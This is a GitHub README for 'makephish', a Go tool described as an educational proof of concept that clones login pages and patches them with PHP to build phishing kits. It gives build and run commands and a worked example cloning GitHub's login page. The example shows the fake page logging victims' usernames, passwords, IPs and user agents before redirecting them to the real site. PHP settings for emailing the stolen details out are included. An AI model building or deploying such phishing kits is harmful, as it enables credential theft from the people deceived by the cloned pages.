Skip to content

Automatically clone websites and patch them with PHP to create phishing pages

License

Notifications You must be signed in to change notification settings

andpalmier/makephish

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

29 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

makephish

makephish logo

Software License Go Report Card follow on X

makephish is a proof of concept tool designed to automate the creation of phishing kits based on a specified URL. It works exclusively with websites featuring simple login pages using HTML <form> elements.

The primary objective of this project is educational. It was created to gain familiarity with Go programming. Consequently, the code may lack optimal organization and quality. Additionally, this project aims to illustrate the ease with which a website can be cloned and repurposed to create phishing pages.

Installation

After cloning the repository, navigate to the project directory and build the executable:

go build -o makephish cmd/makephish/*.go

This will create an executable called makephish. You can run the executable with the following flags:

Usage

  • -url: URL of login page
  • -ua: User Agent string, by defefault "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
  • -php: Path to the PHP file to be used, by default "phish.php"
  • -kits: Path used to store the kits, by default "./kits"

Example

$ ./makephish -url "https://github.com/login/"

           _           _   _     _
 _____  __| |_ ___ ___| |_|_|___| |_
|     ||. | '_| -_| . |   | |_ -|   |
|_|_|_|___|_|_|___|  _|_|_|_|___|_|_|
                  |_|


Navigating to https://github.com/login using the following User agent string: Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0
Parameters found in the form of the given URL:
 - post action = /session
 - login attribute name = login
 - password attribute name = password
HTML file patched and saved in kits/github.com
PHP file saved in kits/github.com

[*] operation completed! kit created for https://github.com/login and saved in kits/github.com

$ tree kits/github.com
kits/github.com
├── assets
│   ├── behaviors-afe1a202.js
│   ├── chunk-frameworks-81b94425.js
│   ├── chunk-vendor-4d97ead9.js
│   ├── environment-f0adafbf.js
│   ├── frameworks-052cbe13e4b93c9b8358a7178885c1a0.css
│   ├── github-f19f9fd1ee83046f59cf1815d967f4d0.css
│   ├── sessions-45084fea.js
│   ├── settings-c44d66a8.js
│   ├── site-ca634d80a8a0df2203c34902267667dc.css
│   └── unsupported-a85b1284.js
├── index.html
└── phish.php

1 directory, 12 files

$ cd kits/github.com
$ php -S localhost:8000
[Sun Jan 10 12:10:54 2021] PHP 7.4.14 Development Server (http://localhost:8000) started

At this point, if you go to localhost:8000 you should find something like this:

fakeGH

If you enter some random credentials, you will note that you will be redirected to the original login page provided:

realGH

If you didn't modify the phish.php file, you can find the credentials you just entered in localhost:8000/log:

logs

PHP capabilities

A simple PHP file is provided in this repo, but you can easily adjust it to your needs. By default, the file will save username, password, User Agent string, and IP of the victim in a log file. You can disable this option by removing the content of the variable log. You can also specify an email address to send these details via email every time a new victim enters the credentials.

$exfilemail = ""; // -> enter an email address to send the details via email
$logpath = "log"; // -> make this variable empty to disable logging feature

About

Automatically clone websites and patch them with PHP to create phishing pages

Topics

Resources

License

Stars

Watchers

Forks